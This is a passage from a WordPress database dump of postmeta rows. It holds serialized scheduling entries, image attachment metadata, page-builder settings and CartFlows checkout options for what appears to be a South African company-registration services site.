uler_IntervalSchedule\0start_timestamp\";i:1566565438;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(15508,30483,'_wp_attached_file','2019/06/companyregistration-web-e1563787290497.png'),(15509,30483,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:518;s:6:\"height\";i:135;s:4:\"file\";s:50:\"2019/06/companyregistration-web-e1563787290497.png\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-150x135.png\";s:5:\"width\";i:150;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"companyregistration-web-e1563787290497-300x78.png\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-400x135.png\";s:5:\"width\";i:400;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-400x135.png\";s:5:\"width\";i:400;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-510x135.png\";s:5:\"width\";i:510;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-400x135.png\";s:5:\"width\";i:400;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-400x135.png\";s:5:\"width\";i:400;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-510x133.png\";s:5:\"width\";i:510;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-400x135.png\";s:5:\"width\";i:400;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-510x133.png\";s:5:\"width\";i:510;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:50:\"companyregistration-web-e1563787290497-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20174,33185,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566578981;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17637,30173,'_edit_lock','1563887869:3'),(20175,33186,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566578981;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17635,31334,'_edit_lock','1563887550:3'),(17636,28314,'_edit_lock','1563887729:3'),(17634,31377,'_edit_lock','1563887488:3'),(20172,33183,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566574567;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20173,33184,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566574568;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20170,33181,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566569564;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20171,33182,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566569564;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20164,33175,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566556104;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20162,33173,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566552494;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20165,33176,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566556104;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20163,33174,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566552494;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20161,33172,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566548591;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20160,33171,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566548591;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17169,31371,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:96;s:6:\"height\";i:128;s:4:\"file\";s:20:\"2019/07/secure-1.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"secure-1-96x100.png\";s:5:\"width\";i:96;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"secure-1-96x100.png\";s:5:\"width\";i:96;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17170,31371,'_cartflows_image_hash','0dc305ed3394d0ce0de9da6e2185abca2a8c0e28'),(17168,31371,'_wp_attached_file','2019/07/secure-1.png'),(17167,31370,'_cartflows_image_hash','ee4b120be6ad35191c1a2b23d6344b6b51156d43'),(17164,31369,'_cartflows_image_hash','ad87441b6c210d2d60359edc80903e2220eab9f6'),(17165,31370,'_wp_attached_file','2019/07/guarantee-1.png'),(17166,31370,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:128;s:6:\"height\";i:123;s:4:\"file\";s:23:\"2019/07/guarantee-1.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"guarantee-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"guarantee-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17163,31369,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:110;s:6:\"height\";i:128;s:4:\"file\";s:21:\"2019/07/privacy-1.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"privacy-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"privacy-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17161,31368,'_cartflows_image_hash','c08bcb317fce6b912bf997befdf8c1f5b3e2576a'),(17162,31369,'_wp_attached_file','2019/07/privacy-1.png'),(17160,31368,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:17:\"2019/07/user1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"user1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:17:\"user1-300x250.png\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:17:\"user1-300x284.png\";s:5:\"width\";i:300;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:17:\"user1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"user1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17158,31367,'_cartflows_image_hash','667931abd6c83f2236035fd13c950ca7b8025fe3'),(17159,31368,'_wp_attached_file','2019/07/user1.png'),(17155,31366,'_cartflows_image_hash','668af79aa8941d4a512dd8b200729714ff2c601d'),(17156,31367,'_wp_attached_file','2019/07/user2.png'),(17157,31367,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:17:\"2019/07/user2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"user2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:17:\"user2-300x250.png\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:17:\"user2-300x284.png\";s:5:\"width\";i:300;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:17:\"user2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"user2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17153,31366,'_wp_attached_file','2019/07/5stars-free-img.png'),(17154,31366,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:105;s:6:\"height\";i:19;s:4:\"file\";s:27:\"2019/07/5stars-free-img.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"5stars-free-img-100x19.png\";s:5:\"width\";i:100;s:6:\"height\";i:19;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"5stars-free-img-100x19.png\";s:5:\"width\";i:100;s:6:\"height\";i:19;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17605,30118,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:2:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";}s:6:\"subset\";a:3:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}}'),(20141,33152,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566502831;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20145,33156,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566512516;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20144,33155,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566512516;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20147,33158,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566520075;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(20146,33157,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566520075;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17149,31364,'_cartflows_image_hash','d8bd0f9b69f7f0d08b3f64bfd1b40dc9acd15732'),(19568,32948,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566139348;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17143,31362,'site-sidebar-layout','default'),(17144,31362,'site-content-layout','default'),(17145,31362,'theme-transparent-header-meta','default'),(17146,31362,'_uabb_lite_converted','yes'),(17147,31364,'_wp_attached_file','2019/07/bg-graphics.png'),(17148,31364,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:23:\"2019/07/bg-graphics.png\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"bg-graphics-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"bg-graphics-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"bg-graphics-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"bg-graphics-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"bloom_image\";a:4:{s:4:\"file\";s:23:\"bg-graphics-610x343.png\";s:5:\"width\";i:610;s:6:\"height\";i:343;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:23:\"bg-graphics-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:24:\"bg-graphics-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:23:\"bg-graphics-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:23:\"bg-graphics-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:24:\"bg-graphics-1080x608.png\";s:5:\"width\";i:1080;s:6:\"height\";i:608;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:23:\"bg-graphics-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"bg-graphics-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"bg-graphics-510x287.png\";s:5:\"width\";i:510;s:6:\"height\";i:287;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"bg-graphics-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"bg-graphics-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"bg-graphics-510x287.png\";s:5:\"width\";i:510;s:6:\"height\";i:287;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"bg-graphics-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17141,31362,'_wp_old_slug','checkout-page'),(17142,31362,'enable-to-import','1'),(17140,31362,'_et_pb_dark_text_color','#7a7a7a'),(17134,31362,'_et_pb_built_for_post_type','page'),(17135,31362,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"31362\" /]'),(17136,31362,'_thumbnail_id','6328'),(17137,31362,'_et_builder_version','BB|Divi|3.27.3'),(17138,31362,'_et_pb_show_page_creation','off'),(17139,31362,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:4:{s:32:\"et-gf-encode-sans-semi-condensed\";s:66:\"Encode+Sans+Semi+Condensed:100,200,300,regular,500,600,700,800,900\";s:10:\"et-gf-abel\";s:12:\"Abel:regular\";s:13:\"et-gf-poppins\";s:134:\"Poppins:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";s:12:\"et-gf-roboto\";s:91:\"Roboto:100,100italic,300,300italic,regular,italic,500,500italic,700,700italic,900,900italic\";}s:6:\"subset\";a:8:{i:0;s:10:\"vietnamese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"devanagari\";i:4;s:8:\"cyrillic\";i:5;s:5:\"greek\";i:6;s:9:\"greek-ext\";i:7;s:12:\"cyrillic-ext\";}}'),(20179,33190,'_action_manager_schedule','O:32:\"ActionScheduler_IntervalSchedule\":2:{s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1566588955;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:3600;}'),(17131,31362,'wcf-shipping_city','no'),(17132,31362,'wcf-shipping_state','no'),(17133,31362,'wcf-shipping_postcode','no'),(17128,31362,'wcf-shipping_country','no'),(17129,31362,'wcf-shipping_address_1','no'),(17130,31362,'wcf-shipping_address_2','no'),(17107,31362,'wcf-bump-border-color','#ff4800'),(17108,31362,'wcf-bump-border-style','inherit'),(17109,31362,'wcf-bump-bg-color','#ffffff'),(17110,31362,'wcf-show-coupon-field','no'),(17111,31362,'wcf-checkout-additional-fields','no'),(17112,31362,'wcf-custom-checkout-fields','yes'),(17113,31362,'wcf-shipto-diff-addr-fields','no'),(17114,31362,'wcf-billing_first_name','yes'),(17115,31362,'wcf-billing_last_name','yes'),(17116,31362,'wcf-billing_company','no'),(17117,31362,'wcf-billing_country','no'),(17118,31362,'wcf-billing_address_1','no'),(17119,31362,'wcf-billing_address_2','no'),(17120,31362,'wcf-billing_city','no'),(17121,31362,'wcf-billing_state','no'),(17122,31362,'wcf-billing_postcode','no'),(17123,31362,'wcf-billing_phone','no'),(17124,31362,'wcf-billing_email','no'),(17125,31362,'wcf-shipping_first_name','no'),(17126,31362,'wcf-shipping_last_name','no'),(17127,31362,'wcf-shipping_company','no'),(17106,31362,'wcf-order-bump-desc','S50(1) Every company must-\r\n(a)establish or cause to be established a register of its issued securities in the prescribed form; and\r\n(b)maintain its securities register in accordance with the prescribed standards.'),(17103,31362,'wcf-order-bump-position','after-order'),(17104,31362,'wcf-order-bump-label','Yes, I will take it! For R250'),(17105,31362,'wcf-order-bump-hl-text','Company Law Requirement'),(17089,31362,'wcf-submit-color','#ffffff'),(17090,31362,'wcf-submit-hover-color','#ffffff'),(17091,31362,'wcf-submit-bg-color','#242f6b'),(17092,31362,'wcf-submit-bg-hover-color','#242f6b'),(17093,31362,'wcf-submit-border-color','#242f6b'),(17094,31362,'wcf-submit-border-hover-color','#242f6b'),(17095,31362,'wcf-active-tab','wcf-pre-checkout-offer'),(17096,31362,'wcf-enable-product-options','no'),(17097,31362,'wcf-product-options','force-all'),(17098,31362,'wcf-enable-product-variation','no'),(17099,31362,'wcf-product-variation-options','inline'),(17100,31362,'wcf-enable-product-quantity','no'),(17101,31362,'wcf-order-bump-style','style-2'),(17102,31362,'wcf-order-bump','yes'),(17087,31362,'wcf-field-label-color','#404040'),(17088,31362,'wcf-input-button-size','33px'),(17083,31362,'wcf-input-field-size','33px'),(17084,31362,'wcf-field-color','#555555'),(17085,31362,'wcf-field-bg-color','#ffffff'),(17086,31362,'wcf-field-border-color','#d4d4d4'),(17073,31362,'wcf-input-font-weight','100'),(17074,31362,'wcf-heading-font-family','\'Roboto\', sans-serif'),(17075,31362,'wcf-heading-font-weight','100'),(17076,31362,'wcf-base-font-family','\'Roboto\', sans-serif'),(17077,31362,'wcf-advance-options-fields','no'),(17078,31362,'wcf-button-font-family','\'Roboto\', sans-serif'),(17079,31362,'wcf-button-font-weight','100'),(17080,31362,'wcf-primary-color','#242f6b'),(17081,31362,'wcf-heading-color','#404040'),(17082,31362,'wcf-fields-skins','style-one'),(17071,31362,'wcf-checkout-layout','one-column'),(17072,31362,'wcf-input-font-family','\'Roboto\', sans-serif'),(17065,31362,'_wp_page_template','cartflows-canvas'),(17066,31362,'_et_pb_post_hide_nav','default'),(17067,31362,'_et_pb_page_layout','et_right_sidebar'),(17070,31362,'wcf-field-google-font-url','//fonts.googleapis.com/css?family=Roboto|Roboto:100|Roboto:100|Roboto:100'),(17068,31362,'_et_pb_side_nav','off'),(17069,31362,'_et_pb_use_builder','on'),(16893,31317,'_cartflows_image_hash','8555bbe9c8f4ec151f91ff37b0573011c664610c'),(16892,31317,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:160;s:6:\"height\";i:160;s:4:\"file\";s:30:\"2019/07/client3-free-img-4.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"client3-free-img-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"client3-free-img-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"client3-free-img-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(16890,31316,'_cartflows_image_hash','9a942bcc0f433070692cffd616fe357bbeeb2ece'),(16891,31317,'_wp_attached_file','2019/07/client3-free-img-4.png'),(16889,31316,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:160;s:6:\"height\";i:160;s:4:\"file\";s:28:\"2019/07/client4-free-img.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"client4-free-img-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"client4-free-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"client4-free-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\